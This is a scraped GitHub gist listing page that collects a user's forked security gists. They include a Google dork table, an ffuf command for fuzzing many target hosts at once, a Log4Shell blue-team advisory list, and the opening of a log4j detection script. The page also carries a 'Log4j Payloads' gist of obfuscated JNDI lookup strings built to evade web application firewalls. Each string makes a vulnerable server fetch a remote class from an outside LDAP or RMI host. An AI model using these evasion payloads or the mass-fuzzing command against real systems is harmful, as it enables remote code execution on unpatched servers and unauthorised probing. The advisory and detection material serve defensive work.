| Filter | Description | Example |
|---|---|---|
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
raytheon0x21
/ MASS-FUZZ
Created
February 22, 2023 06:54
— forked from remonsec/MASS-FUZZ
FFUF command for fuzzing over multiple host
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ===[ Start Fuzzing ]=== | |
| ffuf -w common.txt:FUZZ -w ~/bb/target/httpx.txt:URL -u URLFUZZ -mc 200 -of csv -o ffuf-result.txt | |
| ===[ See The Result ]=== | |
| cat ffuf-result.txt | awk -F ',' '{print $3}' | |
| N.B: My wordlist have '/' at beginning | |
| Example: /.git | |
| If your wordlist start with '.git' |
raytheon0x21
/ GoogleDorking.md
Created
January 15, 2022 09:01
— forked from sundowndev/GoogleDorking.md
Google dork cheatsheet
raytheon0x21
/ Log4j Payloads
Created
December 13, 2021 07:26
— forked from ZephrFish/Log4j Payloads
Collection of WAF evasion payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
| ${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} |
raytheon0x21
/ 20211210-TLP-WHITE_LOG4J.md
Created
December 13, 2021 00:48
— forked from SwitHak/20211210-TLP-WHITE_LOG4J.md
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 2204 UTC
Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
- If you want to add a link, comment or send it to me
- Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak
- Royce Williams list is different, listed by vendors responses:
- https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
- TBD
raytheon0x21
/ log4j_rce_check.py
Created
December 12, 2021 01:24
— forked from byt3bl33d3r/log4j_rce_check.py
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| ''' | |
| Needs Requests (pip3 install requests) | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
| This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |